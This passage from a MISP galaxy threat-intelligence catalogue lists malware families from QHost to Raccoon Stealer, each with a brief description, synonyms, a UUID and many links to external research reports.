- https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - webarchive
- https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html - webarchive
- https://krebsonsecurity.com/2023/08/u-s-hacks-qakbot-quietly-removes-botnet-infections/ - webarchive
- https://www.bleepingcomputer.com/news/security/qbot-needs-only-30-minutes-to-steal-your-credentials-emails/ - webarchive
- https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/ - webarchive
- https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros - webarchive
- https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern - webarchive
- https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/ - webarchive
- https://docs.velociraptor.app/blog/2023/2023-04-05-qakbot/ - webarchive
- https://web.archive.org/web/20110909041410/http://www.symantec.com/connect/blogs/qakbot-data-thief-unmasked-part-i - webarchive
- https://www.malwarology.com/2022/04/qakbot-series-api-hashing/ - webarchive
- https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis - webarchive
- https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/ - webarchive
- https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html - webarchive
- https://kienmanowar.wordpress.com/2024/04/24/quicknote-qakbot-5-0-decrypt-strings-and-configuration/ - webarchive
- https://www.malwarology.com/posts/1-qakbot-strings-obfuscation/ - webarchive
- http://contagiodump.blogspot.com/2010/11/template.html - webarchive
- https://www.zscaler.com/blogs/security-research/tracking-15-years-qakbot-development - webarchive
- https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/ - webarchive
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ - webarchive
- https://www.elastic.co/security-labs/qbot-malware-analysis - webarchive
- https://www.youtube.com/watch?v=cmJpRncrAp0 - webarchive
- https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/ - webarchive
- https://www.securityhomework.net/articles/qakbot_ccs_prioritization_and_new_record_types/qakbot_ccs_prioritization_and_new_record_types.php - webarchive
- https://www.youtube.com/watch?v=iB1psRMtlqg - webarchive
- https://embeeresearch.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
- https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7 - webarchive
- https://www.malwarology.com/posts/2-qakbot-conf-extraction/ - webarchive
- https://www.elastic.co/de/security-labs/qbot-malware-analysis - webarchive
- https://asec.ahnlab.com/en/44662/ - webarchive
- https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/ - webarchive
- https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/ - webarchive
- https://www.dsih.fr/article/5020/comment-qbot-revient-en-force-avec-onenote.html - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ - webarchive
- https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - webarchive
- https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer - webarchive
- https://lab52.io/blog/bypassing-qakbot-anti-analysis-tactics/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/ - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://securelist.com/qakbot-technical-analysis/103931/ - webarchive
- https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html - webarchive
- https://www.elastic.co/security-labs/qbot-configuration-extractor - webarchive
- https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html - webarchive
- https://zw01f.github.io/malware%20analysis/qakbot/ - webarchive
- https://www.splunk.com/en_us/blog/security/from-macros-to-no-macros-continuous-malware-improvements-by-qakbot.html - webarchive
- https://www.group-ib.com/blog/egregor - webarchive
- https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89 - webarchive
- https://labs.k7computing.com/index.php/qakbot-returns/ - webarchive
- https://www.malwarology.com/2022/04/qakbot-series-string-obfuscation/ - webarchive
- https://socprime.com/blog/qbot-malware-detection-old-dog-new-tricks/ - webarchive
- https://www.rapid7.com/blog/post/2023/04/18/automating-qakbot-detection-at-scale-with/ - webarchive
- https://www.group-ib.com/blog/prolock_evolution - webarchive
- https://blog.cyble.com/2023/02/17/the-many-faces-of-qakbot-malware-a-look-at-its-diverse-distribution-methods/ - webarchive
- https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://twitter.com/tylabs/status/1462195377277476871 - webarchive
- https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html - webarchive
- https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html - webarchive
- https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ - webarchive
- https://isc.sans.edu/diary/rss/28448 - webarchive
- https://github.com/0xThiebaut/PCAPeek/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.justice.gov/d9/2023-08/23mj4251_application_redacted.pdf - webarchive
- https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta - webarchive
- https://securelist.com/cve-2024-30051/112618 - webarchive
- https://web.archive.org/web/20130530033754/http://www.symantec.com/connect/blogs/qakbot-steals-2gb-confidential-data-week - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf - webarchive
- https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QHost
According to F-Secure, this is a network worm with backdoor capabilities that spreads on Win32 systems. The worm was reported in the wild in July-August 2000. The worm itself is a Win32 executable file about 120K long, written in MS Visual C++.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QHost.
Known Synonyms |
---|
Tolouge |
Internal MISP references
UUID 28f35535-dd40-4ee2-8064-5acbe76d8d4c
which can be used as unique global reference for QHost
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QtBot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QtBot.
Known Synonyms |
---|
qtproject |
Internal MISP references
UUID e8240391-3e3d-4894-ba80-f8e8de8a8222
which can be used as unique global reference for QtBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QuantLoader
Internal MISP references
UUID e6005ce5-3e3d-4dfb-8de7-3da45e89e549
which can be used as unique global reference for QuantLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat - webarchive
- https://twitter.com/Arkbird_SOLG/status/1458973883068043264 - webarchive
- https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QUARTERRIG
A stager used by APT29 to download and run CobaltStrike. Here, MUSKYBEAT refers to the in-memory dropper component, while STATICNOISE is the final payload / downloader.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QUARTERRIG.
Known Synonyms |
---|
MUSKYBEAT |
STATICNOISE |
Internal MISP references
UUID ef29604c-1fc8-4f3f-9342-dbb28bb1bd5b
which can be used as unique global reference for QUARTERRIG
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.quarterrig - webarchive
- https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf - webarchive
- https://www.gov.pl/attachment/6f51bb1a-3ad2-461c-a16d-408915a56f77 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Quasar RAT
Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Quasar RAT.
Known Synonyms |
---|
CinaRAT |
QuasarRAT |
Yggdrasil |
Internal MISP references
UUID 05252643-093b-4070-b62f-d5836683a9fa
which can be used as unique global reference for Quasar RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat - webarchive
- https://www.antiy.cn/research/notice&report/research_report/20201228.html - webarchive
- https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols - webarchive
- https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf - webarchive
- https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html - webarchive
- https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers - webarchive
- https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://www.youtube.com/watch?v=yimh33nSOt8 - webarchive
- https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign - webarchive
- https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://blog.morphisec.com/syk-crypter-discord - webarchive
- https://asec.ahnlab.com/en/31089/ - webarchive
- https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/ - webarchive
- https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord? - webarchive
- https://twitter.com/malwrhunterteam/status/789153556255342596 - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-riverside - webarchive
- https://blog.ensilo.com/uncovering-new-activity-by-apt10 - webarchive
- https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt- - webarchive
- https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/ - webarchive
- https://securelist.com/apt-trends-report-q1-2021/101967/ - webarchive
- https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage - webarchive
- https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/ - webarchive
- https://embee-research.ghost.io/shodan-censys-queries/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://blog.minerva-labs.com/trapping-quasar-rat - webarchive
- https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html - webarchive
- https://twitter.com/struppigel/status/1130455143504318466 - webarchive
- https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934 - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf - webarchive
- https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/ - webarchive
- https://blog.rootshell.be/2022/02/11/sans-isc-cinarat-delivered-through-html-id-attributes/ - webarchive
- https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/ - webarchive
- https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/ - webarchive
- https://www.cisa.gov/news-events/analysis-reports/ar18-352a - webarchive
- http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments - webarchive
- https://embeeresearch.io/shodan-censys-queries/ - webarchive
- https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf - webarchive
- https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
- https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/ - webarchive
- https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/ - webarchive
- https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape - webarchive
- https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 - webarchive
- https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques - webarchive
- https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848 - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
- https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html - webarchive
- https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt - webarchive
- https://medium.com/cycraft/china-implicated-in-prolonged-supply-chain-attack-targeting-taiwan-financial-sector-264b6a1c3525 - webarchive
- https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite - webarchive
- https://github.com/jeFF0Falltrades/rat_king_parser - webarchive
- https://therecord.media/chinese-hackers-linked-to-months-long-attack-on-taiwanese-financial-sector/ - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_9_takeda_furukawa_en.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/aluminum-saratoga - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://embee-research.ghost.io/hunting-quasar-rat-shodan - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://dfir.ch/posts/asyncrat_quasarrat/ - webarchive
- https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign - webarchive
- https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/ - webarchive
- https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html - webarchive
- https://blog.reversinglabs.com/blog/rats-in-the-library - webarchive
- https://blog.malwarelab.pl/posts/venom/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time - webarchive
- http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa - webarchive
- https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QuickHeal
Internal MISP references
UUID 8a4747a4-8165-40eb-abfe-fd674558ecb4
which can be used as unique global reference for QuickHeal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QUICKMUTE
QuickMute is malware written in C/C++. Functionally, it provides download, RC4 decryption, and in-memory launch of a payload (it expects a PE file with the export function "HttpsVictimMain"). To communicate with the management server, a number of protocols are supported, in particular TCP, UDP, HTTP and HTTPS.
Internal MISP references
UUID 56d5ee92-845e-4b71-814c-2b0f0ca88523
which can be used as unique global reference for QUICKMUTE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QUIETCANARY
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QUIETCANARY.
Known Synonyms |
---|
Kapushka |
Tunnus |
Internal MISP references
UUID 2577fb8d-1511-49f7-9b62-7816137190c8
which can be used as unique global reference for QUIETCANARY
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.quietcanary - webarchive
- https://securelist.com/it-threat-evolution-q2-2023/110355/ - webarchive
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/ - webarchive
- https://www.mandiant.com/resources/blog/turla-galaxy-opportunity - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QuietSieve
According to Microsoft, this is heavily obfuscated .NET malware, primarily geared towards the exfiltration of data from the compromised host, but it can also receive and execute a remote payload from the operator.
Internal MISP references
UUID 49aa0a57-812c-4344-9315-cd8c3220198e
which can be used as unique global reference for QuietSieve
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QuiteRAT
QuiteRAT is a simple remote access trojan written using the Qt libraries.
After sending preliminary system information to its C&C server, it expects a response containing either a supported command code or an actual Windows command (like systeminfo or ipconfig with parameters) to execute.
It was deployed in a campaign exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QuiteRAT.
Known Synonyms |
---|
Acres |
Internal MISP references
UUID 03409fbe-c8ac-41f9-a89b-38dd9f7ef63d
which can be used as unique global reference for QuiteRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.quiterat - webarchive
- https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf - webarchive
- https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966 - webarchive
- https://blog.talosintelligence.com/lazarus-quiterat/ - webarchive
- https://asec.ahnlab.com/ko/56256/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Qulab
Qulab is AutoIt malware focused on stealing and clipping content from victims' machines.
Internal MISP references
UUID 728ce877-6f1d-4719-81df-387a8e395695
which can be used as unique global reference for Qulab
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QvoidStealer
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QvoidStealer.
Known Synonyms |
---|
Qvoid-Token-Grabber |
Internal MISP references
UUID 020950da-79e5-481b-9986-14ed1c97e04c
which can be used as unique global reference for QvoidStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
r77
According to the author, r77 is a ring 3 rootkit that hides everything:
- Files, directories
- Processes & CPU usage
- Registry keys & values
- Services
- TCP & UDP connections
- Junctions, named pipes, scheduled tasks
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular r77.
Known Synonyms |
---|
r77 Rootkit |
Internal MISP references
UUID f577050b-a4a3-4ebd-a9d9-77300f3435f5
which can be used as unique global reference for r77
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
r980
Internal MISP references
UUID 06f63e6b-d177-4e21-b432-e3a219bc0965
which can be used as unique global reference for r980
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Raccoon
Raccoon Stealer is a malware reportedly sold for $75 a week or $200 a month. It gathers personal information including passwords, browser cookies and autofill data, as well as cryptowallet details. Additionally, Raccoon Stealer records system information such as IP addresses and geo-location data.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Raccoon.
Known Synonyms |
---|
Mohazo |
RaccoonStealer |
Racealer |
Racoon |
Internal MISP references
UUID 027fb7d0-3e9b-4433-aee1-c266e165a5cc
which can be used as unique global reference for Raccoon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon - webarchive
- https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/ - webarchive
- https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html - webarchive
- https://drive.google.com/file/d/13HEi9Px8V583sRkUG4Syawuw5qwU-W9Q/view - webarchive
- https://d01a.github.io/raccoon-stealer/ - webarchive
- https://labs.k7computing.com/index.php/raccoon-back-with-new-claws/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf - webarchive
- https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1 - webarchive
- https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a - webarchive
- https://team-cymru.com/blog/2022/03/23/raccoon-stealer-an-insight-into-victim-gates/ - webarchive
- https://www.secureworks.com/research/the-growing-threat-from-infostealers - webarchive
- https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/ - webarchive
- https://www.team-cymru.com/post/inside-the-v1-raccoon-stealer-s-den - webarchive
- https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/ - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://www.cybercrimediaries.com/post/russian-language-cybercriminal-forums-analyzing-the-most-active-and-renowned-communities - webarchive
- https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block - webarchive
- https://www.youtube.com/watch?v=1dbepxN2YD8 - webarchive
- https://github.com/echocti/ECHO-Reports/blob/main/Malware%20Analysis%20Report/RaccoonStealer_V2.0/Raccon%20Stealer%20Technical%20Analysis%20Report.pdf - webarchive
- https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore - webarchive
- https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/ - webarchive
- https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf - webarchive
- https://www.youtube.com/watch?v=kfl_2_NBVGc - webarchive
- https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/ - webarchive
- https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family - webarchive
- https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/ - webarchive
- https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/ - webarchive
- https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-recordbreaker-f6400c11d58b - webarchive
- https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf - webarchive
- https://cyberint.com/blog/financial-services/raccoon-stealer/ - webarchive
- https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8 - webarchive
- https://ke-la.com/information-stealers-a-new-landscape/ - webarchive
- https://www.group-ib.com/blog/fakesecurity_raccoon - webarchive
- https://www.youtube.com/watch?v=5KHZSmBeMps - webarchive
- https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a - webarchive
- https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html - webarchive
- https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/ - webarchive
- https://www.justice.gov/usao-wdtx/pr/newly-unsealed-indictment-charges-ukrainian-national-international-cybercrime-operation - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d - webarchive
- https://decoded.avast.io/threatresearch/avast-q2-2022-threat-report/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/ - webarchive
- https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem - webarchive
- https://blog.cyble.com/2021/10/21/raccoon-stealer-under-the-lens-a-deep-dive-analysis/ - webarchive
- https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/ - webarchive
- https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/ - webarchive
- https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/ - webarchive
- https://asec.ahnlab.com/en/35981/ - webarchive
- https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram - webarchive
- https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949 - webarchive
- https://twitter.com/GroupIB_GIB/status/1570821174736850945 - webarchive
- https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon - webarchive
- https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d - webarchive
- https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf - webarchive
- https://www.riskiq.com/blog/labs/magecart-medialand/ - webarchive
- https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer - webarchive
- https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/ - webarchive
- https://asec.ahnlab.com/ko/25837/ - webarchive
